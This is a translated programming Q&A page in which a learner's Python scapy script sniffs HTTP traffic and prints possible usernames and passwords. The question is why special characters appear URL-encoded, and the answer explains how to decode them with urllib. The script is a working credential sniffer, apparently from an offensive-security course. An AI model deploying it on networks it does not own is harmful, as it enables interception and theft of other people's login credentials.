python-3.x - 带有特殊字符的scapy嗅探
问题描述
嗨,我写了下面的程序,它正在嗅探数据包,我可以看到用户名和密码以及 URL,但是当我输入带有特殊字符的密码时,我会得到这样的“%21”,有人可以帮忙...
#!/bin/python3
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packets)
def get_url(packet):
if packet.haslayer(http.HTTPRequest):
url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
return url
def get_login_info(packet):
if packet.haslayer(http.HTTPRequest):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
#load = str(load)
keybword = ["usr", "uname", "username", "pwd", "pass", "password"]
for eachword in keybword:
if eachword.encode() in load:
return load
def process_sniffed_packets(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request>>" + str(url))
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username and password >>" + str(login_info) + "\n\n")
sniff("eth0")
root@kali:~/python_course_by_zaid# ./packet_sniffer.py
[+] HTTP 请求>>b'testing-ground.scraping.pro/login?mode=login'
[+] 可能的用户名和密码>>b"b'usr=admin&pwd=123456%21%40
它应该打印 123456!@
解决方案
问题是密码是URL 编码的。本质上有些字符不能像 ! 和@,所以它们用 % 转义。
如果您在打印之前对这些字符串进行 URL 解码,您将获得预期的结果。在 Python3 中,您可以像这样解码:
# script.py
import urllib.parse
result = urllib.parse.unquote("123456%21%40")
print(result)
运行它我们得到:
$ python script.py
123456!@
推荐阅读
- python - 如何找到多个数据框的总和值的平均值?
- sql - 我将如何省略名称 jones 但显示具有相同 deptno 的人
- html - HTML/CSS Button Hover 将其他所有内容移开?
- c# - 从下拉列表中检索值到控制器
- javascript - 在同一浏览器选项卡中连接两个 RTCPeerConnections 时,WebRTC 连接偶尔会失败
- arrays - MongoDB返回其中数组包含查询数组中的至少一项
- html - 如何在窗口滚动上显示进度边框
- javascript - 正常运行 6 小时后 Redis 使用 100% CPU
- python - Python数据科学初学者函数题
- postgresql - 如何返回由触发器为 JOOQ 记录存储创建的值?